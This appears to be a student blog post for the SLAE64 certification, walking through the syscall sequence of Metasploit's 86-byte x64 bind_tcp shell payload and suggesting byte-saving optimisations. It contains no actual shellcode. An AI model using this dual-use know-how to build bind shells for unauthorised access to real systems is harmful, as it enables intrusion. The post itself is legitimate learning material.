SLAE64: Assignment 5 – Metasploit payloads analysis #2

The second payload that I decided to analyze for the 5th assignment of the SecuritTube Linux Assembly Expert certification was linux/x64/shell/bind_tcp.

This payload has 86 bytes which has impressed me, by comparison to what I’ve achieved with my own bind shell implementation, even considering that my implementation was password protected.

The section starts as expected with a call to the socket() system call and stores the resulting sockfd in rdi. Smart use of the CDQ op to save 1 byte in nulling rdx. Also the use of xchg allows saving one extra byte as well without changing functionality.

In the initial section above one prepares the sockaddr structure to be used in subsequent syscalls (by storing it on stack and loading it’s address on rsi). The authors obviously decided to save some bytes by filling the structure in a single mov instruction but this comes with the appearance of a null byte in the resulting shellcode. Also i believe the mov instruction could easily be replaced by a pushpop combo that would achieve the same end result while saving one extra byte.

The call to bind() system call follows without much to add, rdi already contains the sockfd and rsi already contains &sockaddr.

With the socket bound to the desired port (4444 in this example) it’s time to call listen() syscall which will block until a connection comes in. Nothing special to note here.

Nothing special to note about the code above, when a connection is made to the desired port a call to the system call accept() (0x32 or 43 as per unistd_64.h) is issued.

The last instruction above stores the new socket file descriptor returned in rax into rdi to use in the next syscall.

The section above simply redirects STDERR, STDOUT and STDIN to the new socket by calling dup2() system call in a loop (0x2, 0x1 and 0x0).

The final section sets up the call to execve() syscall wich will run the ‘/bin/sh’ shell.

Again the use of CDQ to null rdx is very smart but I believe the code could be even further optimized by replacing the mov instruction at 0x4000c9 with a pushpop combo that would save us an extra byte.

Overall, I believe the code could be further optimized a little bit, but still, I’ve learned some nice optimizations that I might come to apply to my own shellcodes.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification.

Student ID: SLAE64-1440

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.